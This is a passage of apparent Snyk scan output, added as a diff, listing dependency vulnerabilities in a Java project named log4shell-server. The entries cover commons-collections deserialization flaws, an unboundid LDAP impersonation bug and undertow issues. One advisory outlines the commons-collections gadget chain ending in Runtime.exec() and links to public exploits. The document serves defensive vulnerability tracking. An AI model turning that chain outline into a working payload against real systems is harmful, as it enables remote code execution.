By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,3.2.2)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 5.6,
+ "functions": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/pull/18",
+ "title": "GitHub PR"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Ticket"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 5.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:03:34.698666Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent 
through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. 
So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n",
+ "epssDetails": {
+ "percentile": "0.82742",
+ "probability": "0.00880",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-6420"
+ ],
+ "CWE": [
+ "CWE-502"
+ ],
+ "GHSA": [
+ "GHSA-6hgm-866r-3cjv"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2019-10-10T18:31:03.943542Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2019-10-10T00:00:00Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2020-02-24T00:00:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:35.761152Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMUNBOUNDID-32143",
+ "title": "User Impersonation",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,4.0.5)"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [
+ "4.0.5"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java",
+ "className": "SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "com.unboundid:unboundid-ldapsdk",
+ "references": [
+ {
+ "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134",
+ "title": "NVD"
+ },
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531",
+ "title": "RedHat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 7,
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:02:05.592817Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)",
+ "epssDetails": {
+ "percentile": "0.80961",
+ "probability": "0.00729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2018-1000134"
+ ],
+ "CWE": [
+ "CWE-284"
+ ]
+ },
+ "packageName": "com.unboundid:unboundid-ldapsdk",
+ "proprietary": false,
+ "creationTime": "2018-03-16T00:00:00Z",
+ "functions_new": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "className": "com.unboundid.ldap.sdk.SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2018-03-16T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "com.unboundid",
+ "artifactId": "unboundid-ldapsdk"
+ },
+ "publicationTime": "2018-04-01T14:18:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:49:40.956024Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "upgradePath": [
+ false,
+ "com.unboundid:unboundid-ldapsdk@4.0.5"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "com.unboundid:unboundid-ldapsdk",
+ "version": "3.1.1"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "low",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
